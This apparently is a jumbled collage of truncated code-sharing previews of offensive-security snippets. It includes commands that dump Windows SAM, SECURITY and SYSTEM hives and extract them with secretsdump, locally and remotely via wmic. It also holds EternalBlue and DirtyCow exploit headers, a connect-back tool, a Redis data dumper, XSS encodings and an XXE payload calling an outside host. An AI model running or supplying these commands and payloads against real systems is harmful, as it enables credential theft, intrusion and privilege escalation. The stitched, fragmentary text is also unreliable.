| Android Penetration Testing Tools 2015 | |
| by CHEF-KOCH | |
| ============== | |
| Note: | |
| 1. These apps are not for beginners because expertise is needed on the Android platform. | |
| 2. Most of the apps work on Rooted Android devices. So root your Android device first. If you are not sure how to do it, learn how to by, reading one of the many sites available to help with this process. | |
| 3. You will lose your device’s warranty if you root it, so think twice before proceeding. | |
| 4. These apps can also harm your Android device. So please try these apps at your own risk |
| < | |
| %3C | |
| < | |
| < | |
| < | |
| < | |
| < | |
| < | |
| < | |
| < |
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| reg.exe save hklm\sam c:\temp\sam.save | |
| reg.exe save hklm\security c:\temp\security.save | |
| reg.exe save hklm\system c:\temp\system.save | |
| secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | |
| #https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py | |
| #Do this remotely | |
| wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save" |
| /* | |
| Connect back tools | |
| compile under linux | |
| 2003-07-11 now support FreeBSD .. | |
| now support user define echo value | |
| [bkbll@mobile bkbll]$ uname -a | |
| Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown | |
| %uname -a | |
| FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386 | |
| [bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555 |
| /* | |
| Dump data from open Redis instance. | |
| Usage: node redis_dump.js -h 10.10.0.1 | |
| node redis_dump.js -n 10 #dumps the first 10 keys from the instance | |
| node redis_dump.js -k keyname #dump the value of a specific key | |
| Author: etienne@sensepost.com | |
| Version: 1.0 12 February 2015 | |
| */ | |
| var redis = require("redis") |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:
<constant name="struts.devMode" value="true" />
Then the middleware will be handling additional parameters passed to every function invocation.
| /* | |
| * (un)comment correct payload first (x86 or x64)! | |
| * | |
| * $ gcc cowroot.c -o cowroot -pthread | |
| * $ ./cowroot | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * Size of binary: 57048 | |
| * Racing, this may take a while.. | |
| * /usr/bin/passwd overwritten |
| #ifdef SHELL | |
| gcc -Wall -Werror $0 && ./a.out | |
| exit $? | |
| #endif | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| #include <stdlib.h> |
